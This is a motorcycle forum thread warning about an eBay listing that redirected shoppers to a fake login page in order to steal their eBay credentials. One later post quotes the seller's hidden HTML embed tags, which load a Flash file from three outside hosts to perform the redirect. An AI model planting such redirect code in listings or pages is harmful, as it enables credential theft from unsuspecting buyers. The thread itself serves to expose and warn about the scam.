Kawasaki ZX-10R Forum banner

1 - 12 of 12 Posts

·
Registered
58 Posts
Discussion Starter #1
(I submitted a similar post as a reply to a forum classified but decided to post it here so more people would be aware of the scam.)

Did a search for Ninja motorcycles on ebay. One of the results was for a custom-painted 2005 ZX-10R with 3000 miles and a BUY IT NOW price of $4000. The price was the first red flag. The second was that I recognized the photo as being a bike belonging to forum member starboykevin.

From the list of Ninjas for sale I clicked on the listing for this custom-painted bike. That took me to a normal ebay auction page with a legitimate URL. Before that page could completely load, however, I was automatically redirected to an identical page with a non-ebay URL belonging to some company in Portugal.

The redirect was barely perceptible. If you did not notice the odd URL you could easily be fooled. Routinely when you bid on an item or ask a seller a question, ebay requires you to login. The ingenious part of this scam is that if you do bid or ask a question, you'll send your user ID and password directly to the scammers.

I'm used to seeing ebay listings that are scams. And I've gotten my share of phony emails that are suppposedly from ebay. But I've never seen a legitimate ebay page that was programmed to automatically redirect to a scam page. Does anyone know how this is done? Most scams are pretty obvious. But you really have to be on your toes to catch a scam like this.

It's item number 180114083984. To see it, go to ebay and search for this item number. Then watch as the URL changes from an ebay URL to a foreign URL.

·
Registered
735 Posts
i just tried it and its already blocked.. its a reported phishing website

·
Registered
58 Posts
Discussion Starter #4
i just tried it and its already blocked..
That's odd. I just searched for it too and as far as I can tell it's still on ebay. Also searched for NINJA again in ebay motors and the listing came up. Maybe it's a difference in our browsers. I'm using Safari on a Mac.

I reported it to ebay when I first discovered it but as far as I can tell they have not done anything about it.

Item number 180114083984.

·
Registered
11,624 Posts
Still there and Firefox 2.0 and Zone Alarm will allow the redirect.

Very tricky these furners. Since it's going to someplace in Portugal, I suspect luis.pita must have a hand in it. :lol:

·
Registered
58 Posts
Discussion Starter #8
Found it!

Embedded in the source code of the scam ebay listing is the following code:

http://quai13.com/acx/v16/crombid.swf

The seller simply added this code to the end of his item description. Redirects you straight to the phoney auction page. Very tricky and disturbingly simple to do. Wonder how many people have had their passwords stolen using this technique.

By the way, quai13.com is some French television station in Marseilles. From there it redirects to the Portuguese site. Chances are, though, that the scammers hacked into both of these sites to use as fronts.

·
Registered
10 Posts
I had my password stolen and auction copied once, those bastard scammers are everywhere. There are tons of fake bike and car auctions on ebay that use these tactics. I buy a lot on ebay and have reported many of these over the last few months.

·
Registered
764 Posts
I just tried it too and my browser blocked it as a phishing site. If you are running IE 7 you should be protected from being redirected. I guess this is one of those times MS actually got a security issue right.

·
Registered
227 Posts
(I submitted a similar post as a reply to a forum classified but decided to post it here so more people would be aware of the scam.)

Did a search for Ninja motorcycles on ebay. One of the results was for a custom-painted 2005 ZX-10R with 3000 miles and a BUY IT NOW price of $4000. The price was the first red flag. The second was that I recognized the photo as being a bike belonging to forum member starboykevin.

From the list of Ninjas for sale I clicked on the listing for this custom-painted bike. That took me to a normal ebay auction page with a legitimate URL. Before that page could completely load, however, I was automatically redirected to an identical page with a non-ebay URL belonging to some company in Portugal.

The redirect was barely perceptible. If you did not notice the odd URL you could easily be fooled. Routinely when you bid on an item or ask a seller a question, ebay requires you to login. The ingenious part of this scam is that if you do bid or ask a question, you'll send your user ID and password directly to the scammers.

I'm used to seeing ebay listings that are scams. And I've gotten my share of phony emails that are suppposedly from ebay. But I've never seen a legitimate ebay page that was programmed to automatically redirect to a scam page. Does anyone know how this is done? Most scams are pretty obvious. But you really have to be on your toes to catch a scam like this.

It's item number 180114083984. To see it, go to ebay and search for this item number. Then watch as the URL changes from an ebay URL to a foreign URL.
A Friend came up with this.

Not too difficult if you look at the source in his
desription, as it only has this in there:

<embed src="http://fatout.co.kr/acx/v16/crombid.swf" align="middle" height="20" width="20">
<embed src="http://quai13.com/acx/v16/crombid.swf" align="middle"
height="20" width="20">
<embed src="http://cisfl.org/acx/v16/crombid.swf" align="middle"
height="20" width="20">

These are doing the redirects.

It looks like the first one has been pulled already, but
the second one is still working. Bonus points for adding
in more than one in case the links got pulled.

·
Registered
679 Posts
yeah this is really bad.. but appreciate the heads up..i will DEF keep an eye out for this when shopping other auctions.. some people will do ANYTHING except make and honest bucK!!!

1 - 12 of 12 Posts